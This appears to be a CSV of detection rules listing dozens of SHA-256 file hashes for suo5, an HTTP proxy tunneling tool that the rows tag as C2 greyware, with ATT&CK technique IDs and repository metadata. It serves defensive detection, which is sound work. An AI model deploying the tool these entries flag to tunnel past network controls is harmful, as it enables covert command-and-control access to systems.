"*5571e24e95485116507bad42b229ca77a98da4ab7ce161d45f35ddacab12a3d6*",".{0,1000}5571e24e95485116507bad42b229ca77a98da4ab7ce161d45f35ddacab12a3d6.{0,1000}","greyware_tool_keyword","suo5","http proxy tunneling tool","T1071 - T1073 - T1075 - T1105 - T1571","TA0008 - TA0011","N/A","N/A","C2","https://github.com/zema1/suo5","1","0","#filehash","N/A","10","10","2036","190","2024-08-28T05:24:25Z","2022-11-22T11:45:26Z"
"*5f43060bb9404309475297ee50dfe456863be25e3e4fc2e8c31300f471d3cc48*",".{0,1000}5f43060bb9404309475297ee50dfe456863be25e3e4fc2e8c31300f471d3cc48.{0,1000}","greyware_tool_keyword","suo5","http proxy tunneling tool","T1071 - T1073 - T1075 - T1105 - T1571","TA0008 - TA0011","N/A","N/A","C2","https://github.com/zema1/suo5","1","0","#filehash","N/A","10","10","2036","190","2024-08-28T05:24:25Z","2022-11-22T11:45:26Z"
"*68a061deb112b2c02ba5f146b2dfc13ac8eafea91f15cb7f0f760bad4cc0c560*",".{0,1000}68a061deb112b2c02ba5f146b2dfc13ac8eafea91f15cb7f0f760bad4cc0c560.{0,1000}","greyware_tool_keyword","suo5","http proxy tunneling tool","T1071 - T1073 - T1075 - T1105 - T1571","TA0008 - TA0011","N/A","N/A","C2","https://github.com/zema1/suo5","1","0","#filehash","N/A","10","10","2036","190","2024-08-28T05:24:25Z","2022-11-22T11:45:26Z"
"*699c657acc47997abe868108294ab6625eae117242db51d6db5a715606a3e56e*",".{0,1000}699c657acc47997abe868108294ab6625eae117242db51d6db5a715606a3e56e.{0,1000}","greyware_tool_keyword","suo5","http proxy tunneling tool","T1071 - T1073 - T1075 - T1105 - T1571","TA0008 - TA0011","N/A","N/A","C2","https://github.com/zema1/suo5","1","0","#filehash","N/A","10","10","2036","190","2024-08-28T05:24:25Z","2022-11-22T11:45:26Z"
"*6bf2e2c83556bad748940200d1ab7e6d10906a50062a0e5ac6ffe779b4449428*",".{0,1000}6bf2e2c83556bad748940200d1ab7e6d10906a50062a0e5ac6ffe779b4449428.{0,1000}","greyware_tool_keyword","suo5","http proxy tunneling tool","T1071 - T1073 - T1075 - T1105 - T1571","TA0008 - TA0011","N/A","N/A","C2","https://github.com/zema1/suo5","1","0","#filehash","N/A","10","10","2036","190","2024-08-28T05:24:25Z","2022-11-22T11:45:26Z"
"*6c40ba5215fcdfbe5dabad38ef1202a1a95b5f31663f695bf404e8075674723e*",".{0,1000}6c40ba5215fcdfbe5dabad38ef1202a1a95b5f31663f695bf404e8075674723e.{0,1000}","greyware_tool_keyword","suo5","http proxy tunneling tool","T1071 - T1073 - T1075 - T1105 - T1571","TA0008 - TA0011","N/A","N/A","C2","https://github.com/zema1/suo5","1","0","#filehash","N/A","10","10","2036","190","2024-08-28T05:24:25Z","2022-11-22T11:45:26Z"
"*6eaacd4b20f6cc94e884edde513bb561f7ce54e3388cb751caa2ffe6b781202e*",".{0,1000}6eaacd4b20f6cc94e884edde513bb561f7ce54e3388cb751caa2ffe6b781202e.{0,1000}","greyware_tool_keyword","suo5","http proxy tunneling tool","T1071 - T1073 - T1075 - T1105 - T1571","TA0008 - TA0011","N/A","N/A","C2","https://github.com/zema1/suo5","1","0","#filehash","N/A","10","10","2036","190","2024-08-28T05:24:25Z","2022-11-22T11:45:26Z"
"*70ff1ea046dbf3a51880965281a9d6a19b87e297303660346d36e7cb7969cd48*",".{0,1000}70ff1ea046dbf3a51880965281a9d6a19b87e297303660346d36e7cb7969cd48.{0,1000}","greyware_tool_keyword","suo5","http proxy tunneling tool","T1071 - T1073 - T1075 - T1105 - T1571","TA0008 - TA0011","N/A","N/A","C2","https://github.com/zema1/suo5","1","0","#filehash","N/A","10","10","2036","190","2024-08-28T05:24:25Z","2022-11-22T11:45:26Z"
"*74c5657c473f13396e3200188c9958acd722072e26af9f6df55e623fb1bb15f8*",".{0,1000}74c5657c473f13396e3200188c9958acd722072e26af9f6df55e623fb1bb15f8.{0,1000}","greyware_tool_keyword","suo5","http proxy tunneling tool","T1071 - T1073 - T1075 - T1105 - T1571","TA0008 - TA0011","N/A","N/A","C2","https://github.com/zema1/suo5","1","0","#filehash","N/A","10","10","2036","190","2024-08-28T05:24:25Z","2022-11-22T11:45:26Z"
"*7a755ed0f04fbb2ca6f802761b50036315ca25802a44a528287911dfaea2ed2a*",".{0,1000}7a755ed0f04fbb2ca6f802761b50036315ca25802a44a528287911dfaea2ed2a.{0,1000}","greyware_tool_keyword","suo5","http proxy tunneling tool","T1071 - T1073 - T1075 - T1105 - T1571","TA0008 - TA0011","N/A","N/A","C2","https://github.com/zema1/suo5","1","0","#filehash","N/A","10","10","2036","190","2024-08-28T05:24:25Z","2022-11-22T11:45:26Z"
"*7d0a1148c6f19ad8597975d65092e77a088de255c958e80403e33eb9826279ca*",".{0,1000}7d0a1148c6f19ad8597975d65092e77a088de255c958e80403e33eb9826279ca.{0,1000}","greyware_tool_keyword","suo5","http proxy tunneling tool","T1071 - T1073 - T1075 - T1105 - T1571","TA0008 - TA0011","N/A","N/A","C2","https://github.com/zema1/suo5","1","0","#filehash","N/A","10","10","2036","190","2024-08-28T05:24:25Z","2022-11-22T11:45:26Z"
"*803441002d464ed753650ca0b322c96a939a7b9d073f9277367b51ea4a894cd5*",".{0,1000}803441002d464ed753650ca0b322c96a939a7b9d073f9277367b51ea4a894cd5.{0,1000}","greyware_tool_keyword","suo5","http proxy tunneling tool","T1071 - T1073 - T1075 - T1105 - T1571","TA0008 - TA0011","N/A","N/A","C2","https://github.com/zema1/suo5","1","0","#filehash","N/A","10","10","2036","190","2024-08-28T05:24:25Z","2022-11-22T11:45:26Z"
"*80f47ef29cb32968c968bee785edf06e0cddc927cc016d7a735c7209300c813e*",".{0,1000}80f47ef29cb32968c968bee785edf06e0cddc927cc016d7a735c7209300c813e.{0,1000}","greyware_tool_keyword","suo5","http proxy tunneling tool","T1071 - T1073 - T1075 - T1105 - T1571","TA0008 - TA0011","N/A","N/A","C2","https://github.com/zema1/suo5","1","0","#filehash","N/A","10","10","2036","190","2024-08-28T05:24:25Z","2022-11-22T11:45:26Z"
"*82b39dd75bda38dccb8f026507c583490b2f37dd299a2efde3c2d20b4a0143b0*",".{0,1000}82b39dd75bda38dccb8f026507c583490b2f37dd299a2efde3c2d20b4a0143b0.{0,1000}","greyware_tool_keyword","suo5","http proxy tunneling tool","T1071 - T1073 - T1075 - T1105 - T1571","TA0008 - TA0011","N/A","N/A","C2","https://github.com/zema1/suo5","1","0","#filehash","N/A","10","10","2036","190","2024-08-28T05:24:25Z","2022-11-22T11:45:26Z"
"*86c8dd3f7083c274723554ad02410bbdaf990836ce6d6047cf3d759bc6761cf5*",".{0,1000}86c8dd3f7083c274723554ad02410bbdaf990836ce6d6047cf3d759bc6761cf5.{0,1000}","greyware_tool_keyword","suo5","http proxy tunneling tool","T1071 - T1073 - T1075 - T1105 - T1571","TA0008 - TA0011","N/A","N/A","C2","https://github.com/zema1/suo5","1","0","#filehash","N/A","10","10","2036","190","2024-08-28T05:24:25Z","2022-11-22T11:45:26Z"
"*8807e7e0d5bf8197bc51533f3731adb29a89f1cb18355d3a3d59a88d73119464*",".{0,1000}8807e7e0d5bf8197bc51533f3731adb29a89f1cb18355d3a3d59a88d73119464.{0,1000}","greyware_tool_keyword","suo5","http proxy tunneling tool","T1071 - T1073 - T1075 - T1105 - T1571","TA0008 - TA0011","N/A","N/A","C2","https://github.com/zema1/suo5","1","0","#filehash","N/A","10","10","2036","190","2024-08-28T05:24:25Z","2022-11-22T11:45:26Z"
"*8b1100e30d38c19fde571ff97412e66cdd2aef68c3699dcdb6b8416798db3cfb*",".{0,1000}8b1100e30d38c19fde571ff97412e66cdd2aef68c3699dcdb6b8416798db3cfb.{0,1000}","greyware_tool_keyword","suo5","http proxy tunneling tool","T1071 - T1073 - T1075 - T1105 - T1571","TA0008 - TA0011","N/A","N/A","C2","https://github.com/zema1/suo5","1","0","#filehash","N/A","10","10","2036","190","2024-08-28T05:24:25Z","2022-11-22T11:45:26Z"
"*940d75fcbce367cd600b46e2cdf9bae1481e6e977064996e11782b8da58fb106*",".{0,1000}940d75fcbce367cd600b46e2cdf9bae1481e6e977064996e11782b8da58fb106.{0,1000}","greyware_tool_keyword","suo5","http proxy tunneling tool","T1071 - T1073 - T1075 - T1105 - T1571","TA0008 - TA0011","N/A","N/A","C2","https://github.com/zema1/suo5","1","0","#filehash","N/A","10","10","2036","190","2024-08-28T05:24:25Z","2022-11-22T11:45:26Z"
"*94a3f1629cf89a01895fbace61e1533c0e7541b39a223581ec247e409ef4c329*",".{0,1000}94a3f1629cf89a01895fbace61e1533c0e7541b39a223581ec247e409ef4c329.{0,1000}","greyware_tool_keyword","suo5","http proxy tunneling tool","T1071 - T1073 - T1075 - T1105 - T1571","TA0008 - TA0011","N/A","N/A","C2","https://github.com/zema1/suo5","1","0","#filehash","N/A","10","10","2036","190","2024-08-28T05:24:25Z","2022-11-22T11:45:26Z"
"*99711b2b9f9da1f166dd69dc4542365edc60adefb2e8863bb8cae2bcd01ad15c*",".{0,1000}99711b2b9f9da1f166dd69dc4542365edc60adefb2e8863bb8cae2bcd01ad15c.{0,1000}","greyware_tool_keyword","suo5","http proxy tunneling tool","T1071 - T1073 - T1075 - T1105 - T1571","TA0008 - TA0011","N/A","N/A","C2","https://github.com/zema1/suo5","1","0","#filehash","N/A","10","10","2036","190","2024-08-28T05:24:25Z","2022-11-22T11:45:26Z"
"*99fbf23aa2b2c348551cd4071c26e0612318fdf92f2699c6ca416368d43d9d21*",".{0,1000}99fbf23aa2b2c348551cd4071c26e0612318fdf92f2699c6ca416368d43d9d21.{0,1000}","greyware_tool_keyword","suo5","http proxy tunneling tool","T1071 - T1073 - T1075 - T1105 - T1571","TA0008 - TA0011","N/A","N/A","C2","https://github.com/zema1/suo5","1","0","#filehash","N/A","10","10","2036","190","2024-08-28T05:24:25Z","2022-11-22T11:45:26Z"
"*9e032a335a7b50b69fec9d0b8ec9c64ae3d9986a6d78c79a013d97920809a282*",".{0,1000}9e032a335a7b50b69fec9d0b8ec9c64ae3d9986a6d78c79a013d97920809a282.{0,1000}","greyware_tool_keyword","suo5","http proxy tunneling tool","T1071 - T1073 - T1075 - T1105 - T1571","TA0008 - TA0011","N/A","N/A","C2","https://github.com/zema1/suo5","1","0","#filehash","N/A","10","10","2036","190","2024-08-28T05:24:25Z","2022-11-22T11:45:26Z"
"*9e3640e44bcdcb5ce5efb6fa63a306e63077427539ebe9a0c6d829808731c73f*",".{0,1000}9e3640e44bcdcb5ce5efb6fa63a306e63077427539ebe9a0c6d829808731c73f.{0,1000}","greyware_tool_keyword","suo5","http proxy tunneling tool","T1071 - T1073 - T1075 - T1105 - T1571","TA0008 - TA0011","N/A","N/A","C2","https://github.com/zema1/suo5","1","0","#filehash","N/A","10","10","2036","190","2024-08-28T05:24:25Z","2022-11-22T11:45:26Z"
"*a44b8353ce6c74595c2426c02d79495ffdd4b2472286b8622a901a430ed25251*",".{0,1000}a44b8353ce6c74595c2426c02d79495ffdd4b2472286b8622a901a430ed25251.{0,1000}","greyware_tool_keyword","suo5","http proxy tunneling tool","T1071 - T1073 - T1075 - T1105 - T1571","TA0008 - TA0011","N/A","N/A","C2","https://github.com/zema1/suo5","1","0","#filehash","N/A","10","10","2036","190","2024-08-28T05:24:25Z","2022-11-22T11:45:26Z"
"*abe2999a43f155a1af72ea97ef48c5c44a5e01fa3f6e1f34ac4c26c97ef17454*",".{0,1000}abe2999a43f155a1af72ea97ef48c5c44a5e01fa3f6e1f34ac4c26c97ef17454.{0,1000}","greyware_tool_keyword","suo5","http proxy tunneling tool","T1071 - T1073 - T1075 - T1105 - T1571","TA0008 - TA0011","N/A","N/A","C2","https://github.com/zema1/suo5","1","0","#filehash","N/A","10","10","2036","190","2024-08-28T05:24:25Z","2022-11-22T11:45:26Z"
"*ac080f7b691d31d63adb6ec24db8b66953977752fec470326e5ee3143da86751*",".{0,1000}ac080f7b691d31d63adb6ec24db8b66953977752fec470326e5ee3143da86751.{0,1000}","greyware_tool_keyword","suo5","http proxy tunneling tool","T1071 - T1073 - T1075 - T1105 - T1571","TA0008 - TA0011","N/A","N/A","C2","https://github.com/zema1/suo5","1","0","#filehash","N/A","10","10","2036","190","2024-08-28T05:24:25Z","2022-11-22T11:45:26Z"
"*ac0d5f70d705c28c1b964693a633feb9eaffd5560f5ca564f96b0552208adf5a*",".{0,1000}ac0d5f70d705c28c1b964693a633feb9eaffd5560f5ca564f96b0552208adf5a.{0,1000}","greyware_tool_keyword","suo5","http proxy tunneling tool","T1071 - T1073 - T1075 - T1105 - T1571","TA0008 - TA0011","N/A","N/A","C2","https://github.com/zema1/suo5","1","0","#filehash","N/A","10","10","2036","190","2024-08-28T05:24:25Z","2022-11-22T11:45:26Z"
"*aefc8f3e8e94a08015cc319e15a650a7b8c1c42ddb6a3f8e296196a0bec54e10*",".{0,1000}aefc8f3e8e94a08015cc319e15a650a7b8c1c42ddb6a3f8e296196a0bec54e10.{0,1000}","greyware_tool_keyword","suo5","http proxy tunneling tool","T1071 - T1073 - T1075 - T1105 - T1571","TA0008 - TA0011","N/A","N/A","C2","https://github.com/zema1/suo5","1","0","#filehash","N/A","10","10","2036","190","2024-08-28T05:24:25Z","2022-11-22T11:45:26Z"
"*af836adb074c6174d4387d9fce5ed7e7bfaba965a21235974e409ab45c771c17*",".{0,1000}af836adb074c6174d4387d9fce5ed7e7bfaba965a21235974e409ab45c771c17.{0,1000}","greyware_tool_keyword","suo5","http proxy tunneling tool","T1071 - T1073 - T1075 - T1105 - T1571","TA0008 - TA0011","N/A","N/A","C2","https://github.com/zema1/suo5","1","0","#filehash","N/A","10","10","2036","190","2024-08-28T05:24:25Z","2022-11-22T11:45:26Z"
"*b2344770edbdf6582fc88f65541386d47a3d079b7ad316dda58004025ad447db*",".{0,1000}b2344770edbdf6582fc88f65541386d47a3d079b7ad316dda58004025ad447db.{0,1000}","greyware_tool_keyword","suo5","http proxy tunneling tool","T1071 - T1073 - T1075 - T1105 - T1571","TA0008 - TA0011","N/A","N/A","C2","https://github.com/zema1/suo5","1","0","#filehash","N/A","10","10","2036","190","2024-08-28T05:24:25Z","2022-11-22T11:45:26Z"
"*b830677a4de7462efd2cf843cd15ab382545f2243567ec1214f52bccccd168cd*",".{0,1000}b830677a4de7462efd2cf843cd15ab382545f2243567ec1214f52bccccd168cd.{0,1000}","greyware_tool_keyword","suo5","http proxy tunneling tool","T1071 - T1073 - T1075 - T1105 - T1571","TA0008 - TA0011","N/A","N/A","C2","https://github.com/zema1/suo5","1","0","#filehash","N/A","10","10","2036","190","2024-08-28T05:24:25Z","2022-11-22T11:45:26Z"
"*b86ee9cb9b2d4f4c8dee5805a0ff07067cb31e8e7ede06159854314f8a3ff4b6*",".{0,1000}b86ee9cb9b2d4f4c8dee5805a0ff07067cb31e8e7ede06159854314f8a3ff4b6.{0,1000}","greyware_tool_keyword","suo5","http proxy tunneling tool","T1071 - T1073 - T1075 - T1105 - T1571","TA0008 - TA0011","N/A","N/A","C2","https://github.com/zema1/suo5","1","0","#filehash","N/A","10","10","2036","190","2024-08-28T05:24:25Z","2022-11-22T11:45:26Z"
"*b8e1e263041bda37b87db45bd826c8dc4a81c0b60055df4f028ec4971cd55211*",".{0,1000}b8e1e263041bda37b87db45bd826c8dc4a81c0b60055df4f028ec4971cd55211.{0,1000}","greyware_tool_keyword","suo5","http proxy tunneling tool","T1071 - T1073 - T1075 - T1105 - T1571","TA0008 - TA0011","N/A","N/A","C2","https://github.com/zema1/suo5","1","0","#filehash","N/A","10","10","2036","190","2024-08-28T05:24:25Z","2022-11-22T11:45:26Z"
"*b957518edefbb9a18a66d6b3c298875e5a34818bb8b8924a58e53b6c863d906e*",".{0,1000}b957518edefbb9a18a66d6b3c298875e5a34818bb8b8924a58e53b6c863d906e.{0,1000}","greyware_tool_keyword","suo5","http proxy tunneling tool","T1071 - T1073 - T1075 - T1105 - T1571","TA0008 - TA0011","N/A","N/A","C2","https://github.com/zema1/suo5","1","0","#filehash","N/A","10","10","2036","190","2024-08-28T05:24:25Z","2022-11-22T11:45:26Z"
"*b9a7d9cee05f2f4132c71ad619dca8ce9d252ee2dabfee18a5ab552cab228fca*",".{0,1000}b9a7d9cee05f2f4132c71ad619dca8ce9d252ee2dabfee18a5ab552cab228fca.{0,1000}","greyware_tool_keyword","suo5","http proxy tunneling tool","T1071 - T1073 - T1075 - T1105 - T1571","TA0008 - TA0011","N/A","N/A","C2","https://github.com/zema1/suo5","1","0","#filehash","N/A","10","10","2036","190","2024-08-28T05:24:25Z","2022-11-22T11:45:26Z"
"*c2df4b64565ed88fc880fe54aee44a67b07804651be9f6b698b1e12784ef40ac*",".{0,1000}c2df4b64565ed88fc880fe54aee44a67b07804651be9f6b698b1e12784ef40ac.{0,1000}","greyware_tool_keyword","suo5","http proxy tunneling tool","T1071 - T1073 - T1075 - T1105 - T1571","TA0008 - TA0011","N/A","N/A","C2","https://github.com/zema1/suo5","1","0","#filehash","N/A","10","10","2036","190","2024-08-28T05:24:25Z","2022-11-22T11:45:26Z"
"*c317bfeaf967b44ca53f18c17c8b03ab7bb6d34c18383419451b28b084a91499*",".{0,1000}c317bfeaf967b44ca53f18c17c8b03ab7bb6d34c18383419451b28b084a91499.{0,1000}","greyware_tool_keyword","suo5","http proxy tunneling tool","T1071 - T1073 - T1075 - T1105 - T1571","TA0008 - TA0011","N/A","N/A","C2","https://github.com/zema1/suo5","1","0","#filehash","N/A","10","10","2036","190","2024-08-28T05:24:25Z","2022-11-22T11:45:26Z"
"*c730f343f26791992ca406e58e182e5185ba8a8bad1e2922c3f13f3f90be8a66*",".{0,1000}c730f343f26791992ca406e58e182e5185ba8a8bad1e2922c3f13f3f90be8a66.{0,1000}","greyware_tool_keyword","suo5","http proxy tunneling tool","T1071 - T1073 - T1075 - T1105 - T1571","TA0008 - TA0011","N/A","N/A","C2","https://github.com/zema1/suo5","1","0","#filehash","N/A","10","10","2036","190","2024-08-28T05:24:25Z","2022-11-22T11:45:26Z"
"*c7ad0c513a383487e712f2e5d61984f547071fa31e67c76d213647018e7251ca*",".{0,1000}c7ad0c513a383487e712f2e5d61984f547071fa31e67c76d213647018e7251ca.{0,1000}","greyware_tool_keyword","suo5","http proxy tunneling tool","T1071 - T1073 - T1075 - T1105 - T1571","TA0008 - TA0011","N/A","N/A","C2","https://github.com/zema1/suo5","1","0","#filehash","N/A","10","10","2036","190","2024-08-28T05:24:25Z","2022-11-22T11:45:26Z"
"*c7dc584320f2e080de96e2889fa8139adfa1fe60aa2a670476a4bf6703fad2cb*",".{0,1000}c7dc584320f2e080de96e2889fa8139adfa1fe60aa2a670476a4bf6703fad2cb.{0,1000}","greyware_tool_keyword","suo5","http proxy tunneling tool","T1071 - T1073 - T1075 - T1105 - T1571","TA0008 - TA0011","N/A","N/A","C2","https://github.com/zema1/suo5","1","0","#filehash","N/A","10","10","2036","190","2024-08-28T05:24:25Z","2022-11-22T11:45:26Z"
"*cc29d56606b58a553757b5a24398b0d44c899eda409a6c9b55a4085e6b47aa8c*",".{0,1000}cc29d56606b58a553757b5a24398b0d44c899eda409a6c9b55a4085e6b47aa8c.{0,1000}","greyware_tool_keyword","suo5","http proxy tunneling tool","T1071 - T1073 - T1075 - T1105 - T1571","TA0008 - TA0011","N/A","N/A","C2","https://github.com/zema1/suo5","1","0","#filehash","N/A","10","10","2036","190","2024-08-28T05:24:25Z","2022-11-22T11:45:26Z"
"*d172534380f802e8a74ef1ca3ae9bf0900d4c111cb79a9b6f4259a0bc8e744fa*",".{0,1000}d172534380f802e8a74ef1ca3ae9bf0900d4c111cb79a9b6f4259a0bc8e744fa.{0,1000}","greyware_tool_keyword","suo5","http proxy tunneling tool","T1071 - T1073 - T1075 - T1105 - T1571","TA0008 - TA0011","N/A","N/A","C2","https://github.com/zema1/suo5","1","0","#filehash","N/A","10","10","2036","190","2024-08-28T05:24:25Z","2022-11-22T11:45:26Z"
"*d377c470516465e280c764e07ea16f50cc090082e0a7b888a0b76e42aa1f832c*",".{0,1000}d377c470516465e280c764e07ea16f50cc090082e0a7b888a0b76e42aa1f832c.{0,1000}","greyware_tool_keyword","suo5","http proxy tunneling tool","T1071 - T1073 - T1075 - T1105 - T1571","TA0008 - TA0011","N/A","N/A","C2","https://github.com/zema1/suo5","1","0","#filehash","N/A","10","10","2036","190","2024-08-28T05:24:25Z","2022-11-22T11:45:26Z"
"*d57bf88fbac385c407440291aeeffce75f46a1fa251efd5e3edac9d60f1e6984*",".{0,1000}d57bf88fbac385c407440291aeeffce75f46a1fa251efd5e3edac9d60f1e6984.{0,1000}","greyware_tool_keyword","suo5","http proxy tunneling tool","T1071 - T1073 - T1075 - T1105 - T1571","TA0008 - TA0011","N/A","N/A","C2","https://github.com/zema1/suo5","1","0","#filehash","N/A","10","10","2036","190","2024-08-28T05:24:25Z","2022-11-22T11:45:26Z"
"*d7ebe2b8352754e396c34d75c90e53ecd5fc15edb4492fc52eaba80a3ae991eb*",".{0,1000}d7ebe2b8352754e396c34d75c90e53ecd5fc15edb4492fc52eaba80a3ae991eb.{0,1000}","greyware_tool_keyword","suo5","http proxy tunneling tool","T1071 - T1073 - T1075 - T1105 - T1571","TA0008 - TA0011","N/A","N/A","C2","https://github.com/zema1/suo5","1","0","#filehash","N/A","10","10","2036","190","2024-08-28T05:24:25Z","2022-11-22T11:45:26Z"
"*db312dd2a5735817125933d4fcee8ebab756c9f402e35c687b5f967658628307*",".{0,1000}db312dd2a5735817125933d4fcee8ebab756c9f402e35c687b5f967658628307.{0,1000}","greyware_tool_keyword","suo5","http proxy tunneling tool","T1071 - T1073 - T1075 - T1105 - T1571","TA0008 - TA0011","N/A","N/A","C2","https://github.com/zema1/suo5","1","0","#filehash","N/A","10","10","2036","190","2024-08-28T05:24:25Z","2022-11-22T11:45:26Z"
"*db6cf2fe1a2aef656873303d04ae8125bde61b11eccd551dc57969353a2c8141*",".{0,1000}db6cf2fe1a2aef656873303d04ae8125bde61b11eccd551dc57969353a2c8141.{0,1000}","greyware_tool_keyword","suo5","http proxy tunneling tool","T1071 - T1073 - T1075 - T1105 - T1571","TA0008 - TA0011","N/A","N/A","C2","https://github.com/zema1/suo5","1","0","#filehash","N/A","10","10","2036","190","2024-08-28T05:24:25Z","2022-11-22T11:45:26Z"
"*e08ab2c0c649bc8d642c0587c57a19183467debabf900244f903e2adb96cf7a7*",".{0,1000}e08ab2c0c649bc8d642c0587c57a19183467debabf900244f903e2adb96cf7a7.{0,1000}","greyware_tool_keyword","suo5","http proxy tunneling tool","T1071 - T1073 - T1075 - T1105 - T1571","TA0008 - TA0011","N/A","N/A","C2","https://github.com/zema1/suo5","1","0","#filehash","N/A","10","10","2036","190","2024-08-28T05:24:25Z","2022-11-22T11:45:26Z"
"*e1fa98aad857ad4bd52fb9aa42ba37b69aabfc0c1300da1d815b4e29c88d4270*",".{0,1000}e1fa98aad857ad4bd52fb9aa42ba37b69aabfc0c1300da1d815b4e29c88d4270.{0,1000}","greyware_tool_keyword","suo5","http proxy tunneling tool","T1071 - T1073 - T1075 - T1105 - T1571","TA0008 - TA0011","N/A","N/A","C2","https://github.com/zema1/suo5","1","0","#filehash","N/A","10","10","2036","190","2024-08-28T05:24:25Z","2022-11-22T11:45:26Z"
"*e31cae3bfd37dedab001475b1571ddd186de0d4f01d4809b6e5b836e3a37c312*",".{0,1000}e31cae3bfd37dedab001475b1571ddd186de0d4f01d4809b6e5b836e3a37c312.{0,1000}","greyware_tool_keyword","suo5","http proxy tunneling tool","T1071 - T1073 - T1075 - T1105 - T1571","TA0008 - TA0011","N/A","N/A","C2","https://github.com/zema1/suo5","1","0","#filehash","N/A","10","10","2036","190","2024-08-28T05:24:25Z","2022-11-22T11:45:26Z"
"*e3bbd11937075f6f6bb49c9118eea1579ef207967e89ef6b36fa91ebb81f729a*",".{0,1000}e3bbd11937075f6f6bb49c9118eea1579ef207967e89ef6b36fa91ebb81f729a.{0,1000}","greyware_tool_keyword","suo5","http proxy tunneling tool","T1071 - T1073 - T1075 - T1105 - T1571","TA0008 - TA0011","N/A","N/A","C2","https://github.com/zema1/suo5","1","0","#filehash","N/A","10","10","2036","190","2024-08-28T05:24:25Z","2022-11-22T11:45:26Z"
"*e6403e735f7ad321c83f64f4ecf5c3043dc167a4adb3163241003215b00ace9c*",".{0,1000}e6403e735f7ad321c83f64f4ecf5c3043dc167a4adb3163241003215b00ace9c.{0,1000}","greyware_tool_keyword","suo5","http proxy tunneling tool","T1071 - T1073 - T1075 - T1105 - T1571","TA0008 - TA0011","N/A","N/A","C2","https://github.com/zema1/suo5","1","0","#filehash","N/A","10","10","2036","190","2024-08-28T05:24:25Z","2022-11-22T11:45:26Z"
"*e64474e508d054c891d808e0702db18d3bf4304af5ae6ec2997c8aa59f4240e4*",".{0,1000}e64474e508d054c891d808e0702db18d3bf4304af5ae6ec2997c8aa59f4240e4.{0,1000}","greyware_tool_keyword","suo5","http proxy tunneling tool","T1071 - T1073 - T1075 - T1105 - T1571","TA0008 - TA0011","N/A","N/A","C2","https://github.com/zema1/suo5","1","0","#filehash","N/A","10","10","2036","190","2024-08-28T05:24:25Z","2022-11-22T11:45:26Z"
"*e7ad0cf754fa39b84ce801efadf247786a2d93e3126101562414da5bee4173e0*",".{0,1000}e7ad0cf754fa39b84ce801efadf247786a2d93e3126101562414da5bee4173e0.{0,1000}","greyware_tool_keyword","suo5","http proxy tunneling tool","T1071 - T1073 - T1075 - T1105 - T1571","TA0008 - TA0011","N/A","N/A","C2","https://github.com/zema1/suo5","1","0","#filehash","N/A","10","10","2036","190","2024-08-28T05:24:25Z","2022-11-22T11:45:26Z"
"*e8a2563e142a7165030209e28eddd16861dae29b09c5e9e6c047c2b7f3e2688d*",".{0,1000}e8a2563e142a7165030209e28eddd16861dae29b09c5e9e6c047c2b7f3e2688d.{0,1000}","greyware_tool_keyword","suo5","http proxy tunneling tool","T1071 - T1073 - T1075 - T1105 - T1571","TA0008 - TA0011","N/A","N/A","C2","https://github.com/zema1/suo5","1","0","#filehash","N/A","10","10","2036","190","2024-08-28T05:24:25Z","2022-11-22T11:45:26Z"
"*eccdc25289e45340e203e27ff93a8c0e24b5fb6ba6317ccf1e0ad64296f395ce*",".{0,1000}eccdc25289e45340e203e27ff93a8c0e24b5fb6ba6317ccf1e0ad64296f395ce.{0,1000}","greyware_tool_keyword","suo5","http proxy tunneling tool","T1071 - T1073 - T1075 - T1105 - T1571","TA0008 - TA0011","N/A","N/A","C2","https://github.com/zema1/suo5","1","0","#filehash","N/A","10","10","2036","190","2024-08-28T05:24:25Z","2022-11-22T11:45:26Z"
"*ee5a09ea800c9dd9353a08a8b78e51cb781e211476b793cb6684cd95a18ed096*",".{0,1000}ee5a09ea800c9dd9353a08a8b78e51cb781e211476b793cb6684cd95a18ed096.{0,1000}","greyware_tool_keyword","suo5","http proxy tunneling tool","T1071 - T1073 - T1075 - T1105 - T1571","TA0008 - TA0011","N/A","N/A","C2","https://github.com/zema1/suo5","1","0","#filehash","N/A","10","10","2036","190","2024-08-28T05:24:25Z","2022-11-22T11:45:26Z"
"*ee89364096c5e44a71f4a5b9a939026ae0184f350707e6e42d177ab8b8d7490b*",".{0,1000}ee89364096c5e44a71f4a5b9a939026ae0184f350707e6e42d177ab8b8d7490b.{0,1000}","greyware_tool_keyword","suo5","http proxy tunneling tool","T1071 - T1073 - T1075 - T1105 - T1571","TA0008 - TA0011","N/A","N/A","C2","https://github.com/zema1/suo5","1","0","#filehash","N/A","10","10","2036","190","2024-08-28T05:24:25Z","2022-11-22T11:45:26Z"
"*f0a4507fc58b3c37a70bfd12bc2164fd323e9dcc06cafbc0b048f4b4891b9a49*",".{0,1000}f0a4507fc58b3c37a70bfd12bc2164fd323e9dcc06cafbc0b048f4b4891b9a49.{0,1000}","greyware_tool_keyword","suo5","http proxy tunneling tool","T1071 - T1073 - T1075 - T1105 - T1571","TA0008 - TA0011","N/A","N/A","C2","https://github.com/zema1/suo5","1","0","#filehash","N/A","10","10","2036","190","2024-08-28T05:24:25Z","2022-11-22T11:45:26Z"
"*f191225491a0fd4f9c1e2f0f89d7458aa06d9493e683d374a820e38b49e50e82*",".{0,1000}f191225491a0fd4f9c1e2f0f89d7458aa06d9493e683d374a820e38b49e50e82.{0,1000}","greyware_tool_keyword","suo5","http proxy tunneling tool","T1071 - T1073 - T1075 - T1105 - T1571","TA0008 - TA0011","N/A","N/A","C2","https://github.com/zema1/suo5","1","0","#filehash","N/A","10","10","2036","190","2024-08-28T05:24:25Z","2022-11-22T11:45:26Z"
"*f2173450c0170fe8cbb61ebc77d8fc81fba08641e78a636e3cb0b943bca45eb1*",".{0,1000}f2173450c0170fe8cbb61ebc77d8fc81fba08641e78a636e3cb0b943bca45eb1.{0,1000}","greyware_tool_keyword","suo5","http proxy tunneling tool","T1071 - T1073 - T1075 - T1105 - T1571","TA0008 - TA0011","N/A","N/A","C2","https://github.com/zema1/suo5","1","0","#filehash","N/A","10","10","2036","190","2024-08-28T05:24:25Z","2022-11-22T11:45:26Z"
"*f2f97e523f7f39ab24b30b0a046e59f5b5577452563fc615588dd53bd8c5097e*",".{0,1000}f2f97e523f7f39ab24b30b0a046e59f5b5577452563fc615588dd53bd8c5097e.{0,1000}","greyware_tool_keyword","suo5","http proxy tunneling tool","T1071 - T1073 - T1075 - T1105 - T1571","TA0008 - TA0011","N/A","N/A","C2","https://github.com/zema1/suo5","1","0","#filehash","N/A","10","10","2036","190","2024-08-28T05:24:25Z","2022-11-22T11:45:26Z"
